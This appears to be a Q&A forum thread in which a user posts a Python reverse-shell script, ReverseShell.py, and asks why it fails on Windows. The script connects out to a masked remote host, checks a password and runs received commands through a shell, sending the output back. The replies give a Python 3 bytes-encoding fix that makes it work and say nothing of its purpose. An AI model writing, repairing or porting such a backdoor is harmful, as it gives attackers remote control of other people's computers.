# Python Socket Errors "a bytes-like object is requred not 'str'

Tags: linux, windows, python, sockets

This is my script. It works perfectly on Linux but when I run it on a Windows computer I get 2 errors. which are listed at the bottom.

```
#!/usr/bin/python
import subprocess   
import socket        

host = "*********"   
port = ***           
passwd = "****"  
def Login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        Login()
    else:
        s.send("SHELL ")
        Shell()

#Execute Shell Commands
def Shell():
    while True:
        data = s.recv(1024)

        if data.strip() == ":kill":
            break

        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")

#Start Script
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)       
s.connect((host,port))
Login()
```

**BELOW ARE THE TWO ERRORS** what needs to be changed?

```
C:\Users\IEUser\Desktop\Python>python ReverseShell.py
Traceback (most recent call last):
  File "ReverseShell.py", line 34, in <module>
    Login()
  File "ReverseShell.py", line 11, in Login
    s.send("Login: ")
TypeError: a bytes-like object is required, not 'str'
```

Comment: I wonder if it's a python 2 vs 3 thing. Try to add `.encode("utf-8")` (or maybe `"ascii"`) to all strings in `send()`s, **or** even just add `b` before them.

Comment: I tried running it through 2to3 and it wouldn't make any changes.. I'm thinking the 2 vs 3 is the issue though. should I try adding those lines of code "_.encode("utf-8") (or maybe "ascii"_ "  just at the very beginning of all of the strings like this?

.encode("utf-8") s.connect((host,port))
.encode("utf-8") s.send("Login: ")

or 

b s.connect((host,port))
b s.send("Login: ")

Comment: I meant `"Login: ".encode("utf-8")` or maybe just `b"Login: "`.

Answer (score 1):

In `python2` `sock.send` can take a python `str` in `python3` it must be a `bytes-like object`

A simple fix looks like this

```
'message'.encode('utf-8')
```

In `python2` this will do nothing, in `python3` you get your `bytes`. BAM!

Hope this helps!